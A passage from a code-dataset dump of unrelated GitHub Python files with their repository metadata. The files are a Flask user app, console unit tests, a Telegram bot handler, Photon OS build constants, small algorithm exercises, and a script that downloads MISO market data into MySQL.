values\r\n\r\n\r\n","repo_name":"marianaterintii/calculateTax","sub_path":"tax.py","file_name":"tax.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30310097872","text":"from unittest.mock import patch\nfrom io import StringIO\nimport unittest\nfrom console import HBNBCommand\n\nclass TestHBNBCommand(unittest.TestCase):\n def setUp(self):\n self.cmd = HBNBCommand()\n\n def tearDown(self):\n self.cmd = None\n\n def test_help(self):\n \"\"\"Test the functionality of the help command\"\"\"\n with patch(\"sys.stdout\", new=StringIO()) as f:\n HBNBCommand().onecmd(\"help\")\n output = \"\"\"\nDocumented commands (type help ):\n========================================\nEOF help quit\n\n\n \"\"\"\n\n self.assertEqual(output.strip(), f.getvalue().strip())\n\n def test_help_EOF(self):\n \"\"\"test the functionality of the help-EOF command\n \"\"\"\n with patch(\"sys.stdout\", new=StringIO()) as f:\n HBNBCommand().onecmd(\"help EOF\")\n output = \"\"\"Handles End Of File character\\n\n \"\"\"\n self.assertEqual(output.strip(), f.getvalue().strip())\n\n\n def test_help_quit(self):\n \"\"\"to test the functionality of help quit command\"\"\"\n with patch(\"sys.stdout\", new=StringIO()) as f:\n HBNBCommand().onecmd(\"help quit\")\n output = \"\"\"Quit command to exit the program \\n\n \"\"\"\n self.assertEqual(output.strip(), f.getvalue().strip())\n\n def test_emptyline(self):\n \"\"\"to test the functionality of emptyline\n \"\"\"\n with patch(\"sys.stdout\", new=StringIO()) as f:\n HBNBCommand().onecmd(\"emptyline\")\n output = \"\"\"*** Unknown syntax: emptyline\"\"\"\n self.assertEqual(output.strip(), f.getvalue().strip())\n\nif __name__ == '__main__':\n unittest.main()\n\n","repo_name":"Chukwunonso10/AirBnB_clone","sub_path":"tests/testconsole.py","file_name":"testconsole.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40382832303","text":"from telebot.async_telebot import AsyncTeleBot\nfrom telebot.types import Message\nfrom telebot.asyncio_helper import ApiTelegramException\nfrom telebot import logger\n\nfrom tgbot.utils.extract_id import extract_id\n\nasync def admin_user(message: Message, bot: AsyncTeleBot):\n \"\"\"\n Send the message to the admin.\n \"\"\"\n # Extract the username and ID from the message text\n reply_message = message.reply_to_message\n if reply_message is None:\n await bot.reply_to(\n message,\n text='Please reply to a user\\'s message.'\n )\n return\n\n text = reply_message.text or reply_message.caption\n if text is None:\n await bot.reply_to(\n message,\n text='The replied message does not contain any text or caption.'\n )\n return\n\n username, user_id = extract_id(text)\n if not user_id:\n await bot.reply_to(\n message,\n text='Please reply to a user\\'s message.'\n )\n return\n\n try:\n # Send the message to the user\n await bot.copy_message(\n chat_id=user_id,\n from_chat_id=message.chat.id,\n message_id=message.message_id\n )\n except ApiTelegramException as e:\n if 'blocked' in e.description:\n await bot.reply_to(\n message,\n text='User has blocked the bot.'\n )\n else:\n logger.error(e)\n","repo_name":"Laterport/Anonymous_chatbot-feedbackbot","sub_path":"tgbot/handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"38340371949","text":"from SpecData import SerializableSpecObjectsUtils\nfrom Logger import Logger\n\nclass constants(object):\n specPath=\"\"\n sourcePath=\"\"\n rpmPath=\"\"\n logPath=\"\"\n dist=\"\"\n buildNumber=\"0000000\"\n releaseVersion=\"NNNnNNN\"\n topDirPath=\"\"\n specData=None\n buildRootPath=\"/mnt\"\n prevPublishRPMRepo=\"\"\n pullsourcesConfig=\"\"\n buildPatch=False\n inputRPMSPath=\"\"\n rpmCheck=False\n sourceRpmPath=\"\"\n noDepsPackageList=[\"texinfo\",\"bzip2\",\"gettext\",\"nspr\",\"xz\",\"bison\",\"openjdk\",\"go\"]\n\n # These packages will be built in first order as build-core-toolchain stage\n listCoreToolChainPackages=[\n \"filesystem\",\n \"linux-api-headers\",\n \"glibc\",\n \"zlib\",\n \"file\",\n \"binutils\",\n \"gmp\",\n \"mpfr\",\n \"mpc\",\n \"libgcc\",\n \"libstdc++\",\n \"libgomp\",\n \"gcc\",\n \"pkg-config\",\n \"ncurses\",\n \"readline\",\n \"bash\"]\n\n # These packages will be built in a second stage to replace publish RPMS\n listToolChainPackages=[\n \"filesystem\",\n \"linux-api-headers\",\n \"glibc\",\n \"zlib\",\n \"file\",\n \"binutils\",\n \"gmp\",\n \"mpfr\",\n \"mpc\",\n \"gcc\",\n \"pkg-config\",\n \"ncurses\",\n \"bash\",\n \"bzip2\",\n \"sed\",\n \"procps-ng\",\n \"coreutils\",\n \"m4\",\n \"grep\",\n \"readline\",\n \"diffutils\",\n \"gawk\",\n \"findutils\",\n \"gettext\",\n \"gzip\",\n \"make\",\n \"patch\",\n \"util-linux\",\n \"tar\",\n \"xz\",\n \"libtool\",\n \"flex\",\n \"bison\",\n \"lua\",\n \"popt\",\n \"nspr\",\n \"sqlite-autoconf\",\n \"nss\",\n \"elfutils\",\n \"expat\",\n \"libffi\",\n \"libpipeline\",\n \"gdbm\",\n \"perl\",\n \"texinfo\",\n \"autoconf\",\n \"automake\",\n \"openssl\",\n \"python2\",\n \"rpm\",\n \"groff\",\n \"man-pages\",\n \"cpio\"]\n\n # List or RPMS that will be installed in a chroot prior to build each\n # package. On a stage1 and stage2 published rpms will/might be used\n # after stage2 only local RPMS will be used\n listToolChainRPMsToInstall=[\n \"filesystem\",\n \"linux-api-headers\",\n \"glibc\",\n \"glibc-devel\",\n \"zlib\",\n \"zlib-devel\",\n \"file\",\n \"binutils\",\n \"binutils-devel\",\n \"gmp\",\n \"gmp-devel\",\n \"mpfr\",\n \"mpfr-devel\",\n \"mpc\",\n \"libgcc\",\n \"libgcc-devel\",\n \"libstdc++\",\n \"libstdc++-devel\",\n \"libgomp\",\n \"libgomp-devel\",\n \"gcc\",\n \"pkg-config\",\n \"ncurses\",\n \"bash\",\n \"bzip2\",\n \"bzip2-devel\",\n \"sed\",\n \"ncurses-devel\",\n \"procps-ng\",\n \"coreutils\",\n \"m4\",\n \"grep\",\n \"readline\",\n \"diffutils\",\n \"gawk\",\n \"findutils\",\n \"gettext\",\n \"gzip\",\n \"make\",\n \"patch\",\n \"util-linux\",\n \"util-linux-devel\",\n \"tar\",\n \"xz\",\n \"libtool\",\n \"flex\",\n \"flex-devel\",\n \"bison\",\n \"readline-devel\",\n \"lua\",\n \"lua-devel\",\n \"popt\",\n \"popt-devel\",\n \"nspr\",\n \"sqlite-autoconf\",\n \"sqlite-libs\",\n \"nss\",\n \"nss-devel\",\n \"elfutils-libelf\",\n \"elfutils\",\n \"elfutils-libelf-devel\",\n \"elfutils-devel\",\n \"expat\",\n \"libffi\",\n \"libpipeline\",\n \"gdbm\",\n \"perl\",\n \"texinfo\",\n \"autoconf\",\n \"automake\",\n \"openssl\",\n \"openssl-devel\",\n \"python2\",\n \"python2-libs\",\n \"python2-devel\",\n \"libcap\",\n \"rpm\",\n \"rpm-build\",\n \"rpm-devel\",\n \"rpm-libs\",\n \"groff\",\n \"man-pages\",\n \"cpio\",\n \"go\"]\n\n # List of RPMs which are not published. They will be created during the\n # build process\n listOfRPMsProvidedAfterBuild=[\n \"util-linux-devel\",\n \"flex-devel\",\n \"sqlite-libs\",\n \"rpm-libs\"]\n\n # List of packages that will be installed in addition for each\n # package to make check\n listMakeCheckRPMPkgtoInstall=[\n \"python2\",\n \"python2-devel\",\n \"python2-libs\",\n \"python2-tools\",\n \"libffi\",\n \"python-setuptools\",\n \"ca-certificates\",\n \"linux\",\n \"createrepo\",\n \"sudo\",\n \"ruby\",\n \"curl\",\n \"pcre-devel\",\n \"boost-devel\",\n \"which\",\n \"go\",\n \"e2fsprogs-devel\",\n \"shadow\",\n \"check\",\n \"libacl-devel\",\n \"device-mapper\",\n \"wget\",\n \"tar\",\n \"pkg-config\",\n \"git\",\n \"openssl\",\n \"openssl-devel\",\n \"net-tools\",\n \"less\",\n \"yum-metadata-parser\",\n \"yum\",\n \"rpm-devel\",\n \"rpm\",\n \"libxml2\",\n \"python-xml\",\n \"libacl\",\n \"tzdata\",\n \"libgcrypt-devel\",\n \"Linux-PAM\",\n \"unzip\"]\n\n @staticmethod\n def initialize(options):\n constants.dist = options.dist\n constants.buildNumber = options.buildNumber\n constants.releaseVersion = options.releaseVersion\n constants.specPath = options.specPath\n constants.sourcePath = options.sourcePath\n constants.rpmPath = options.rpmPath\n constants.sourceRpmPath = options.sourceRpmPath\n constants.topDirPath = options.topDirPath\n constants.logPath = options.logPath\n constants.prevPublishRPMRepo=options.publishRPMSPath\n constants.buildRootPath=options.buildRootPath\n constants.specData = SerializableSpecObjectsUtils(constants.logPath)\n constants.specData.readSpecsAndConvertToSerializableObjects(constants.specPath)\n constants.pullsourcesConfig = options.pullsourcesConfig\n constants.inputRPMSPath=options.inputRPMSPath\n constants.updateRPMMacros()\n constants.testForceRPMS=[]\n constants.rpmCheck = options.rpmCheck\n constants.rpmCheckStopOnError = options.rpmCheckStopOnError\n if constants.rpmCheck:\n constants.testLogger=Logger.getLogger(\"MakeCheckTest\",constants.logPath)\n\n @staticmethod\n def updateRPMMacros():\n #adding distribution rpm macro\n constants.specData.addMacro(\"dist\",constants.dist)\n\n #adding buildnumber rpm macro\n constants.specData.addMacro(\"photon_build_number\",constants.buildNumber)\n\n #adding releasenumber rpm macro\n constants.specData.addMacro(\"photon_release_version\",constants.releaseVersion)\n\n #adding kernelversion rpm macro\n kernelversion = constants.specData.getVersion(\"linux\")\n constants.specData.addMacro(\"KERNEL_VERSION\",kernelversion)\n\n #adding kernelrelease rpm macro\n kernelrelease = constants.specData.getRelease(\"linux\")\n constants.specData.addMacro(\"KERNEL_RELEASE\",kernelrelease)\n \n #adding kernelsubrelease rpm macro\n kernelversion = kernelversion.replace(\".\",\"\")\n if kernelversion.isdigit():\n kernelversion = int(kernelversion) << 8\n kernelsubrelease = str(kernelversion)+kernelrelease\n kernelsubrelease = kernelsubrelease.replace(constants.dist,\"\")\n if kernelsubrelease:\n kernelsubrelease = \".\"+kernelsubrelease\n constants.specData.addMacro(\"kernelsubrelease\",kernelsubrelease)\n\n @staticmethod\n def setTestForceRPMS(listsPackages):\n constants.testForceRPMS=listsPackages\n","repo_name":"trumland/photon","sub_path":"support/package-builder/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":7583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"74512284281","text":"# 자신의 부모 노드 찾는 함수\ndef find_set(x):\n while x != p[x]:\n x = p[x]\n return x\n\n# y의 부모를 x의 부모로\ndef union(x, y):\n p[find_set(y)] = find_set(x)\n\ndef kruskal(arr):\n cnt = 0\n for s, e, w in arr:\n # 싸이클 형성이 안 되면, 즉 부모가 다르면\n if find_set(s) != find_set(e):\n cnt += w\n union(s, e)\n return cnt\n\nV, E = map(int, input().split())\nedges = [list(map(int, input().split())) for _ in range(E)]\n# 거리순으로 오름차순 정렬\nedges = sorted(edges, key=lambda x: x[2])\np = list(range(V+1))\nkruskal(edges)","repo_name":"gyoforit/study-algorithm","sub_path":"etc/review_kruskal.py","file_name":"review_kruskal.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40999810861","text":"import random\narr1 = []\narr2 = [[],[],[]]\narr3 = []\narr4 = []\narr5 = []\n\narr1.insert(0, 3)\narr1.insert(1, 7)\narr1.insert(2, 1)\narr1.insert(3, 0)\narr1.insert(4, 4)\n\narr2[0].insert(0, 2)\narr2[0].insert(1,3)\narr2[1].insert(0,7)\narr2[1].insert(1,1)\narr2[2].insert(0,0)\narr2[2].insert(1,4)\n\nfor i in range(7):\n arr3.insert(i, 5)\n \nfor j in range (1, 10):\n arr4.insert(j, j)\n\nfor x in range(10):\n arr5.insert(x, random.randint(1,20))\nprint(arr1)\nprint(arr2)\nprint(arr3)\nprint(arr4)\nprint(arr5)","repo_name":"OwcaGaming/pp1","sub_path":"06-Arrays/ex19.py","file_name":"ex19.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"2176498839","text":"from flask import Flask,render_template,request,redirect\n\nfrom users import User\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return redirect('/read')\n\n@app.route('/read')\ndef read_all():\n user_list = User.get_all()\n return render_template(\"read.html\",user_list = user_list)\n\n@app.route('/new')\ndef new_user():\n return render_template (\"create.html\")\n\n@app.route('/create',methods=[\"POST\"])\ndef create():\n data = {\n \"fname\": request.form[\"fname\"],\n \"lname\" : request.form[\"lname\"],\n \"email\" : request.form[\"email\"]\n }\n User.save(data)\n return redirect('/')\n\nif __name__ == \"__main__\":\n app.run(debug = True)","repo_name":"ChewChuenChan/user_cr","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28217503827","text":"count = 0\r\ndef symmetry(n,a): \r\n global count\r\n if n%2 == 0:\r\n mid = int(n/2)\r\n half1 = a[0 : mid ]\r\n half2 = a[ mid : n]\r\n if half1 == half2 :\r\n count = count + 1\r\n symmetry(mid, a)\r\n \r\n return count\r\n\r\nstring = input()\r\nlength = int(input())\r\nprint(symmetry(length, string))","repo_name":"shruthi-kumaravel/spiderinductionsalgos","sub_path":"task1_q2.py","file_name":"task1_q2.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39698759995","text":"# Author: Omkar Sunkersett\n# Purpose: To fetch MISO data and update the database\n# Summer Internship at Argonne National Laboratory\n\nimport csv, datetime, MySQLdb, os, requests, time\n\nclass MISO():\n\tdef __init__(self, base_url, file_nom, file_ext, prog_dir):\n\t\tself.base_url = base_url\n\t\tself.file_nom = file_nom\n\t\tself.file_ext = file_ext\n\t\tself.prog_dir = prog_dir\n\t\tself.files_cached = []\n\n\tdef fetch_files(self, market_run_id, start_dt, end_dt):\n\t\ttry:\n\t\t\tstart_year = int(start_dt.split('-')[2])\n\t\t\tstart_month = int(start_dt.split('-')[0])\n\t\t\tstart_day = int(start_dt.split('-')[1])\n\t\t\tend_year = int(end_dt.split('-')[2])\n\t\t\tend_month = int(end_dt.split('-')[0])\n\t\t\tend_day = int(end_dt.split('-')[1])\n\n\t\t\tfor year in range(start_year, end_year+1):\n\t\t\t\tif year == end_year:\n\t\t\t\t\tmax_months = end_month\n\t\t\t\telse:\n\t\t\t\t\tmax_months = 12\n\t\t\t\tfor month in range(start_month, max_months+1):\n\t\t\t\t\tif month == end_month and year == end_year:\n\t\t\t\t\t\tmax_days = end_day\n\t\t\t\t\telif month in [1, 3, 5, 7, 8, 10, 12]:\n\t\t\t\t\t\tmax_days = 31\n\t\t\t\t\telif month in [4, 6, 7, 9, 11]:\n\t\t\t\t\t\tmax_days = 30\n\t\t\t\t\telif month == 2 and year % 4 == 0:\n\t\t\t\t\t\tmax_days = 29\n\t\t\t\t\telse:\n\t\t\t\t\t\tmax_days = 28\n\t\t\t\t\tfor day in range(start_day, max_days+1):\n\t\t\t\t\t\tfile_name = str(year) + str(month).zfill(2) + str(day).zfill(2) + self.file_nom + self.file_ext\n\t\t\t\t\t\tresponse = requests.get(self.base_url + '/' + file_name)\n\t\t\t\t\t\tif response.status_code == 200:\n\t\t\t\t\t\t\tif os.path.isdir(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day)) == False:\n\t\t\t\t\t\t\t\tos.makedirs(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day))\n\t\t\t\t\t\t\tos.chdir(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day))\n\t\t\t\t\t\t\tfwrite = open(file_name, 'wb')\n\t\t\t\t\t\t\tfwrite.write(response.content)\n\t\t\t\t\t\t\tfwrite.close()\n\t\t\t\t\t\t\tself.files_cached.append(self.prog_dir + '\\\\cache\\\\miso\\\\' + market_run_id + '\\\\' + str(year) + '\\\\' + str(month) + '\\\\' + str(day) + '\\\\' + file_name)\n\t\t\t\t\t\t\tprint (\"Current File: \" + self.files_cached[-1])\n\t\t\t\t\t\t\ttime.sleep(6)\n\t\t\t\t\t\t\tos.chdir(self.prog_dir)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tprint (\"File Not Found: \" + file_name)\n\t\t\t\t\tstart_day = 1\n\t\t\t\tstart_month = 1\n\t\texcept Exception as e:\n\t\t\tprint (str(e))\n\n\tdef etl_file_data(self, cache_file):\n\t\ttry:\n\t\t\tfread = open(cache_file, 'r')\n\t\t\tflines = [x.rstrip('\\n') for x in fread.readlines() if x.endswith('.csv\\n')]\n\t\t\tfread.close()\n\t\t\tcnx = MySQLdb.connect(user = 'not-published', passwd = 'not-published', host = 'not-published', db = 'not-published')\n\t\t\tcursor = cnx.cursor()\n\t\t\tcursor.execute(\"SELECT market_id FROM market_meta USE INDEX (PRIMARY) WHERE market_name = 'MISO'\")\n\t\t\tmkt_id = cursor.fetchone()[0]\n\t\t\ti = 1\n\t\t\tfor fname in flines:\n\t\t\t\tprint ('Current file: ' + fname + '\\t' + 'Percent complete: ' + str(round((float(i)*100)/len(flines), 2)) + ' %')\n\t\t\t\tfread = open(fname, 'r')\n\t\t\t\tfrows = csv.reader(fread, delimiter = ',')\n\t\t\t\tnext(frows, None)\n\t\t\t\toffer_base_rs = []\n\t\t\t\tins_perf = True\n\t\t\t\tfor row in frows:\n\t\t\t\t\tif len(row) > 0:\n\t\t\t\t\t\tif ins_perf == True:\n\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id, identifier_1, identifier_2 FROM offer_base USE INDEX (IDX_OFFER_BASE_MARKET_ID) WHERE market_id = %s\", (mkt_id,))\n\t\t\t\t\t\t\toffer_base_rs = list(cursor.fetchall())\n\t\t\t\t\t\t\tif len(offer_base_rs) > 0:\n\t\t\t\t\t\t\t\toff_check = [x for (x, y, z) in offer_base_rs if (row[1], row[2]) == (y, z)]\n\t\t\t\t\t\t\t\tif len(off_check) > 0:\n\t\t\t\t\t\t\t\t\toff_id = off_check[0]\n\t\t\t\t\t\t\t\t\tins_perf = False\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO offer_base (identifier_1, identifier_2, region_name, market_id) VALUES (%s, %s, %s, %s)\", (row[1], row[2], row[0], mkt_id))\n\t\t\t\t\t\t\t\t\tins_perf = True\n\t\t\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id FROM offer_base USE INDEX (IDX_OFFER_BASE_ID1_ID2) WHERE identifier_1 = %s AND identifier_2 = %s\", (row[1], row[2]))\n\t\t\t\t\t\t\t\t\toff_id = cursor.fetchone()[0]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO offer_base (identifier_1, identifier_2, region_name, market_id) VALUES (%s, %s, %s, %s)\", (row[1], row[2], row[0], mkt_id))\n\t\t\t\t\t\t\t\tins_perf = True\n\t\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id FROM offer_base USE INDEX (IDX_OFFER_BASE_ID1_ID2) WHERE identifier_1 = %s AND identifier_2 = %s\", (row[1], row[2]))\n\t\t\t\t\t\t\t\toff_id = cursor.fetchone()[0]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\toff_check = [x for (x, y, z) in offer_base_rs if (row[1], row[2]) == (y, z)]\n\t\t\t\t\t\t\tif len(off_check) > 0:\n\t\t\t\t\t\t\t\toff_id = off_check[0]\n\t\t\t\t\t\t\t\tins_perf = False\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO offer_base (identifier_1, identifier_2, region_name, market_id) VALUES (%s, %s, %s, %s)\", (row[1], row[2], row[0], mkt_id))\n\t\t\t\t\t\t\t\tins_perf = True\n\t\t\t\t\t\t\t\tcursor.execute(\"SELECT offer_id FROM offer_base USE INDEX (IDX_OFFER_BASE_ID1_ID2) WHERE identifier_1 = %s AND identifier_2 = %s\", (row[1], row[2]))\n\t\t\t\t\t\t\t\toff_id = cursor.fetchone()[0]\n\n\t\t\t\t\t\tif fname.split('_')[2].lower() =='da':\n\t\t\t\t\t\t\tmrun_id = 'DAM'\n\t\t\t\t\t\telif fname.split('_')[2].lower() =='rt':\n\t\t\t\t\t\t\tmrun_id = 'RTM'\n\t\t\t\t\t\tintv_dt = row[3].split()[0].split('/')[2] + '-' + row[3].split()[0].split('/')[0].zfill(2) + '-' + row[3].split()[0].split('/')[1].zfill(2)\n\t\t\t\t\t\tintv_start = intv_dt + ' ' + row[3].split()[1].split(':')[0].zfill(2) + ':' + row[3].split()[1].split(':')[1].zfill(2) + ':00'\n\t\t\t\t\t\tintv_end = (datetime.datetime.strptime(intv_start, \"%Y-%m-%d %H:%M:%S\") + datetime.timedelta(hours = 1, minutes = 0)).strftime(\"%Y-%m-%d %H:%M:%S\")\n\t\t\t\t\t\thr, iv = (int(row[3].split()[1].split(':')[0]) + 1), 0\n\t\t\t\t\t\tintv_id = str(off_id) + '-' + mrun_id + '-' + intv_start[2:4] + intv_start[5:7] + intv_start[8:10] + intv_start[11:13] + intv_start[14:16]\n\n\t\t\t\t\t\tcursor.execute(\"INSERT INTO interval_meta (interval_id, offer_id, market_id, mkt_run_id, interval_dt, interval_start, interval_end, opr_hour, opr_interval) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\", (intv_id, off_id, mkt_id, mrun_id, intv_dt, intv_start, intv_end, hr, iv))\n\n\t\t\t\t\t\tif mrun_id == 'DAM':\n\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO miso_results (interval_id, reg_max, reg_min, regoff_price, regself_limit, spinoff_price, spinself_limit, onsupp_price, onsuppself_limit, offsupp_price, offsuppself_limit, regavg_mcp, regavg_cap, spinavg_mcp, spinavg_cap, suppavg_mcp, suppavg_cap) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\", (intv_id, float(row[5].zfill(1)), float(row[6].zfill(1)), float(row[7].zfill(1)), float(row[8].zfill(1)), float(row[9].zfill(1)), float(row[10].zfill(1)), float(row[11].zfill(1)), float(row[12].zfill(1)), float(row[13].zfill(1)), float(row[14].zfill(1)), float(row[15].zfill(1)), float(row[16].zfill(1)), float(row[17].zfill(1)), float(row[18].zfill(1)), float(row[19].zfill(1)), float(row[20].zfill(1))))\n\t\t\t\t\t\telif mrun_id == 'RTM':\n\t\t\t\t\t\t\tregmcp = (float(row[14].zfill(1)) + float(row[16].zfill(1)) + float(row[18].zfill(1)) + float(row[20].zfill(1)) + float(row[22].zfill(1)) + float(row[24].zfill(1)) + float(row[26].zfill(1)) + float(row[28].zfill(1)) + float(row[30].zfill(1)) + float(row[32].zfill(1)) + float(row[34].zfill(1)) + float(row[36].zfill(1))) / 12\n\t\t\t\t\t\t\tregcap = (float(row[15].zfill(1)) + float(row[17].zfill(1)) + float(row[19].zfill(1)) + float(row[21].zfill(1)) + float(row[23].zfill(1)) + float(row[25].zfill(1)) + float(row[27].zfill(1)) + float(row[29].zfill(1)) + float(row[31].zfill(1)) + float(row[33].zfill(1)) + float(row[35].zfill(1)) + float(row[37].zfill(1))) / 12\n\t\t\t\t\t\t\tspinmcp = (float(row[38].zfill(1)) + float(row[40].zfill(1)) + float(row[42].zfill(1)) + float(row[44].zfill(1)) + float(row[46].zfill(1)) + float(row[48].zfill(1)) + float(row[50].zfill(1)) + float(row[52].zfill(1)) + float(row[54].zfill(1)) + float(row[56].zfill(1)) + float(row[58].zfill(1)) + float(row[60].zfill(1))) / 12\n\t\t\t\t\t\t\tspincap = (float(row[39].zfill(1)) + float(row[41].zfill(1)) + float(row[43].zfill(1)) + float(row[45].zfill(1)) + float(row[47].zfill(1)) + float(row[49].zfill(1)) + float(row[51].zfill(1)) + float(row[53].zfill(1)) + float(row[55].zfill(1)) + float(row[57].zfill(1)) + float(row[59].zfill(1)) + float(row[61].zfill(1))) / 12\n\t\t\t\t\t\t\tsuppmcp = (float(row[62].zfill(1)) + float(row[64].zfill(1)) + float(row[66].zfill(1)) + float(row[68].zfill(1)) + float(row[70].zfill(1)) + float(row[72].zfill(1)) + float(row[74].zfill(1)) + float(row[76].zfill(1)) + float(row[78].zfill(1)) + float(row[80].zfill(1)) + float(row[82].zfill(1)) + float(row[84].zfill(1))) / 12\n\t\t\t\t\t\t\tsuppcap = (float(row[63].zfill(1)) + float(row[65].zfill(1)) + float(row[67].zfill(1)) + float(row[69].zfill(1)) + float(row[71].zfill(1)) + float(row[73].zfill(1)) + float(row[75].zfill(1)) + float(row[77].zfill(1)) + float(row[79].zfill(1)) + float(row[81].zfill(1)) + float(row[83].zfill(1)) + float(row[85].zfill(1))) / 12\n\t\t\t\t\t\t\tcursor.execute(\"INSERT INTO miso_results (interval_id, reg_max, reg_min, regoff_price, regself_limit, spinoff_price, spinself_limit, onsupp_price, onsuppself_limit, offsupp_price, offsuppself_limit, regavg_mcp, regavg_cap, spinavg_mcp, spinavg_cap, suppavg_mcp, suppavg_cap) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\", (intv_id, float(row[4].zfill(1)), float(row[5].zfill(1)), float(row[6].zfill(1)), float(row[7].zfill(1)), float(row[8].zfill(1)), float(row[9].zfill(1)), float(row[10].zfill(1)), float(row[11].zfill(1)), float(row[12].zfill(1)), float(row[13].zfill(1)), regmcp, regcap, spinmcp, spincap, suppmcp, suppcap))\n\t\t\t\tcnx.commit()\n\t\t\t\tfread.close()\n\t\t\t\ti += 1\n\t\t\tcursor.close()\n\t\t\tcnx.close()\n\t\texcept Exception as e:\n\t\t\tprint (str(e))\n\n\tdef __str__(self):\n\t\ttry:\n\t\t\tos.chdir(self.prog_dir + '\\\\cache\\\\miso')\n\t\t\tfwrite = open(self.file_nom[1:].replace('_', '-') + '.txt', 'w')\n\t\t\tfwrite.write('File(s) cached are as follows:\\n')\n\t\t\tfor file_name in self.files_cached:\n\t\t\t\tfwrite.write(file_name + '\\n')\n\t\t\tfwrite.close()\n\t\t\tos.chdir(self.prog_dir)\n\t\t\treturn (\"File(s) cached: \" + ', '.join(self.files_cached) + '\\n')\n\t\texcept Exception as e:\n\t\t\tprint (str(e))\n\ndef dbdt_check(mkt_name, start_dt, end_dt):\n\ttry:\n\t\tprint (\"\\nStarting the database date validation check...\\n\")\n\t\tcnx = MySQLdb.connect(user = 'not-published', passwd = 'not-published', host = 'not-published', db = 'not-published')\n\t\tcursor = cnx.cursor()\n\t\tcursor.execute(\"SELECT min(interval_dt) AS oldest_dt, max(interval_dt) AS latest_dt FROM interval_meta USE INDEX (IDX_INTERVAL_META_MARKET_ID) WHERE market_id = (SELECT DISTINCT market_id FROM market_meta USE INDEX (PRIMARY) WHERE lower(market_name) = %s)\", (mkt_name.lower(),))\n\t\trs = cursor.fetchone()\n\t\tcursor.close()\n\t\tcnx.close()\n\t\tprint(\"Database Oldest Date (MM-DD-YYYY): \" + datetime.datetime.strftime(rs[0], \"%m-%d-%Y\"))\n\t\tdbdt_start = datetime.datetime.strptime(datetime.datetime.strftime(rs[0], \"%Y-%m-%d\"), \"%Y-%m-%d\")\n\t\tprint(\"Database Latest Date (MM-DD-YYYY): \" + datetime.datetime.strftime(rs[1], \"%m-%d-%Y\"))\n\t\tdbdt_end = datetime.datetime.strptime(datetime.datetime.strftime(rs[1], \"%Y-%m-%d\"), \"%Y-%m-%d\")\n\t\tprint(\"Script Start Date (MM-DD-YYYY): \" + start_dt)\n\t\tstart_dt = datetime.datetime.strptime(start_dt.split('-')[2] + '-' + start_dt.split('-')[0] + '-' + start_dt.split('-')[1], \"%Y-%m-%d\")\n\t\tprint(\"Script End Date (MM-DD-YYYY): \" + end_dt)\n\t\tend_dt = datetime.datetime.strptime(end_dt.split('-')[2] + '-' + end_dt.split('-')[0] + '-' + end_dt.split('-')[1], \"%Y-%m-%d\")\n\t\tif start_dt == (dbdt_end + datetime.timedelta(hours = 24, minutes = 0)) and end_dt >= start_dt and end_dt <= datetime.datetime.strptime(datetime.datetime.strftime(datetime.datetime.now() - datetime.timedelta(hours = 24, minutes = 0), \"%Y-%m-%d\"), \"%Y-%m-%d\"):\n\t\t\tprint (\"\\nThe database date validation check has completed successfully. The program will now execute...\\n\")\n\t\t\treturn True\n\t\telse:\n\t\t\tactual_st = datetime.datetime.strftime(dbdt_end + datetime.timedelta(hours = 24, minutes = 0), \"%Y-%m-%d\")\n\t\t\tactual_ed = datetime.datetime.strftime(datetime.datetime.now() - datetime.timedelta(hours = 24, minutes = 0), \"%Y-%m-%d\")\n\t\t\tprint (\"\\nPlease check the script start and end dates properly. The start date must be set to \" + actual_st.split('-')[1] + '-' + actual_st.split('-')[2] + '-' + actual_st.split('-')[0] + \" (MM-DD-YYYY) and the end date must be less than or equal to \" + actual_ed.split('-')[1] + '-' + actual_ed.split('-')[2] + '-' + actual_ed.split('-')[0] + \" (MM-DD-YYYY) and also not less than the start date.\")\n\t\t\treturn False\n\texcept Exception as e:\n\t\tprint (str(e))\n\n\ndef main():\n\tprint (\"\\n********** Start of the Program **********\\n\")\n\n\t# prog_dir is the main directory under which the CSV files will be stored\n\t#prog_dir = 